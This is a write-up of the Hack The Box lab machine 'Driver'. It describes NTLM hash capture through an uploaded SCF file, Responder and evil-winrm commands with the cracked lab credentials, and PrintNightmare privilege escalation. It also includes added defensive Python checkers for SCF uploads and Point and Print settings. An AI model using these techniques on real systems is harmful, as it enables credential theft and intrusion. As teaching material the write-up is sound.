Posted by secnigma
Prelude
Driver is an easy machine from Hack The Box, developed by MrR3boot. This was an easy but cool box, which demonstrated the recent Print Nightmare vulnerability.
The initial foothold part was also a pretty cool vector, and it taught me how to misuse SCF files to dump NTLM hashes.
Let's start the enumeration.
Exploitation
Nmap returned the following results.
Nmap scan report for 10.10.11.106
Host is up (0.048s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Port 5985 (WinRM) is open, so PowerShell remoting is likely possible.
I navigated to http://10.10.11.106/ and found an HTTP basic authentication prompt.
I used admin:admin and I got logged in!
It was a website where users can upload firmware files for different printers. The site said that once a file is uploaded, someone will manually review and test the firmware.
I tried different payloads, such as exe and msi files, but nothing worked.
Upon further research, I found a way to force NTLM authentication using different file types. I referenced articles from ired.team, BleepingComputer and Pentest Lab on how SCF (Shell Command Files) can be used to force NTLM authentication.
SCF files are a variant of shortcuts and support a very limited set of Windows Explorer commands, such as opening a Windows Explorer window or showing the Desktop. The "Show Desktop" shortcut we all use on a daily basis is an SCF file.
An SCF file can point at a specific UNC path, which allows an attacker to capture the NTLM credential of any victim who browses the folder containing the malicious SCF file. When the victim opens that folder, Explorer automatically establishes a connection from the victim's system to the UNC path given as the icon path in the SCF file. Windows then tries to authenticate to that SMB share with the user's username and password, and Responder captures the victim's NTLMv2 hash.
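The defensive counterpart to the behaviour just described is to inspect uploads by content rather than by extension: an SCF file is plain text with a [Shell] section and an IconFile= line, and the only dangerous case for the reviewer who later opens the upload folder is an IconFile that resolves to a UNC path. The following scanner is an added example and not part of the original writeup or of the Driver box; the three sample uploads (including the EXAMPLE-HOST share name) are constructed here for the demonstration.

```python
import re
from typing import Dict, List

# Constructed sample uploads (not taken from the original writeup). The first has the
# shape of an SCF file whose IconFile points at a UNC path, the second is a benign
# "Show Desktop" style SCF with a local icon, the third is an arbitrary binary blob.
SAMPLE_UPLOADS: Dict[str, bytes] = {
    "firmware.scf": (
        b"[Shell]\r\nCommand=2\r\nIconFile=\\\\EXAMPLE-HOST\\share\\icon.ico\r\n"
        b"[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ),
    "showdesktop.scf": (
        b"[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
        b"[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ),
    "printer-fw.bin": b"\x7fFIRMWARE\x00\x01\x02\xff\xfe",
}

# A [Shell] section is what makes Explorer treat the file as a shell command file.
SHELL_SECTION_RE = re.compile(r"^\s*\[shell\]\s*$", re.IGNORECASE | re.MULTILINE)
# IconFile=<path> is the field Explorer resolves (and authenticates to) when rendering the icon.
ICONFILE_RE = re.compile(r"^\s*IconFile\s*=\s*(.+?)\s*$", re.IGNORECASE | re.MULTILINE)
# UNC paths start with \\host\ or //host/; a local path or "explorer.exe,3" does not.
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")


def scf_unc_targets(text: str) -> List[str]:
    """Return every UNC path referenced by an IconFile= line of an SCF-shaped text."""
    if not SHELL_SECTION_RE.search(text):
        return []
    return [m.group(1) for m in ICONFILE_RE.finditer(text) if UNC_RE.match(m.group(1))]


def scan_upload(name: str, data: bytes) -> Dict[str, object]:
    """Classify one upload by its content, not by the extension the uploader chose."""
    # SCF files are plain text; a real firmware blob simply will not match the patterns.
    text = data.decode("utf-8", errors="ignore")
    targets = scf_unc_targets(text)
    return {
        "name": name,
        "is_scf": bool(SHELL_SECTION_RE.search(text)),
        "unc_targets": targets,
        "reject": bool(targets),
    }


def rejected_uploads(uploads: Dict[str, bytes]) -> List[str]:
    """Names of uploads that would coerce an SMB authentication when their folder is browsed."""
    return [name for name, data in uploads.items() if scan_upload(name, data)["reject"]]


if __name__ == "__main__":
    for name, data in SAMPLE_UPLOADS.items():
        print(scan_upload(name, data))
    print("rejected:", rejected_uploads(SAMPLE_UPLOADS))
```

Rejecting the file at upload time is only one layer; the same coercion works from any writable share, so blocking outbound SMB (TCP 445) at the network edge and enforcing SMB signing remove most of the value of a captured NTLMv2 hash regardless of how the SCF arrives.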
I created the malicious SCF file with the following contents.
Then I uploaded the SCF file to the firmware upload page fw_up.php and started Responder with the following command, and I got the NTLMv2 hash of the user tony.
sudo responder -I tun0
I then used a super cool hash identification tool called NTH (Name-That-Hash) to find the hash type and the matching hashcat/JtR mode number. Name-That-Hash can be cloned from its GitHub repository, or installed on Kali Linux with the command: sudo apt install name-that-hash
Hashes can be passed directly with the -t flag, or a file containing hashes can be passed with the -f flag.
Syntax: nth -t <HASH> OR nth -f <FILE-LOCATION>
The hash was cracked, and the password for the user tony was liltony.
I then used evil-winrm to log in as tony, since port 5985 is open.
evil-winrm -u tony -p 'liltony' -i 10.10.11.106
And I got in as tony!
Privilege Escalation
From the hints I had seen on this machine so far, it was obvious that it was vulnerable to the recent Print Nightmare vulnerability.
CVE-2021-1675 / Print Nightmare is a vulnerability in the Print Spooler service, affecting all Windows versions alike. It allows anyone with valid credentials on a Windows machine to add a new printer and load drivers for it.
There is more than one way to exploit this vulnerability, and you can read more about them on 0xdf's blog.
I used the PowerShell script hosted in this GitHub repo, mentioned in 0xdf's blog.
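Whether a low-privileged user can load a printer driver on a given host is governed by the Point and Print policy values under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint; Microsoft's Print Nightmare guidance is that NoWarningNoElevationOnInstall and UpdatePromptSettings must be 0 (or absent) and that driver installation should be restricted to administrators. The checker below is an added example, not code from the original writeup or from the box, and takes a .reg export of that key as input; the two exports (a weak one and a hardened one) are constructed here, and the value names are from Microsoft's published guidance rather than from anything observed on Driver.

```python
import re
from typing import Dict, List

# Registry key holding the Point and Print policy values (per Microsoft's Print Nightmare guidance).
POINT_AND_PRINT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

# Constructed .reg exports (not taken from the host in the writeup). The first shows weak
# settings that let non-admin users install drivers without a prompt; the second is hardened.
WEAK_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint]
"NoWarningNoElevationOnInstall"=dword:00000001
"UpdatePromptSettings"=dword:00000002
"""

HARDENED_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint]
"NoWarningNoElevationOnInstall"=dword:00000000
"UpdatePromptSettings"=dword:00000000
"RestrictDriverInstallationToAdministrators"=dword:00000001
"""

SECTION_RE = re.compile(r"^\[(.+?)\]\s*$")
DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})\s*$')


def parse_point_and_print(reg_text: str) -> Dict[str, int]:
    """Collect the DWORD values under the PointAndPrint key from a .reg export; other keys are ignored."""
    values: Dict[str, int] = {}
    in_key = False
    for line in reg_text.splitlines():
        section = SECTION_RE.match(line)
        if section:
            in_key = section.group(1).lower() == POINT_AND_PRINT_KEY.lower()
            continue
        match = DWORD_RE.match(line)
        if in_key and match:
            values[match.group("name")] = int(match.group("hex"), 16)
    return values


def assess_point_and_print(values: Dict[str, int]) -> List[str]:
    """Return one finding per setting that weakens the spooler's driver-installation controls."""
    findings: List[str] = []
    # Both of these must be 0 (or absent); otherwise the Print Nightmare fix is not effective.
    if values.get("NoWarningNoElevationOnInstall", 0) != 0:
        findings.append("NoWarningNoElevationOnInstall is non-zero: drivers install without warning or elevation")
    if values.get("UpdatePromptSettings", 0) != 0:
        findings.append("UpdatePromptSettings is non-zero: driver updates are accepted without a prompt")
    # On patched hosts the default is 1 (administrators only); an explicit 0 reopens installs to users.
    if values.get("RestrictDriverInstallationToAdministrators", 1) != 1:
        findings.append("RestrictDriverInstallationToAdministrators is 0: non-admins may install printer drivers")
    return findings


if __name__ == "__main__":
    for label, export in (("weak", WEAK_EXPORT), ("hardened", HARDENED_EXPORT)):
        print(label, assess_point_and_print(parse_point_and_print(export)) or ["no findings"])
```

The registry check complements, rather than replaces, patching: on a host that does not need to serve print jobs, stopping and disabling the Spooler service removes the attack surface entirely, and a driver added by a non-administrator on a hardened host is itself a signal worth alerting on.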
I used evil-winrm's upload feature to upload the script. After that, I used the following commands to load and execute the script.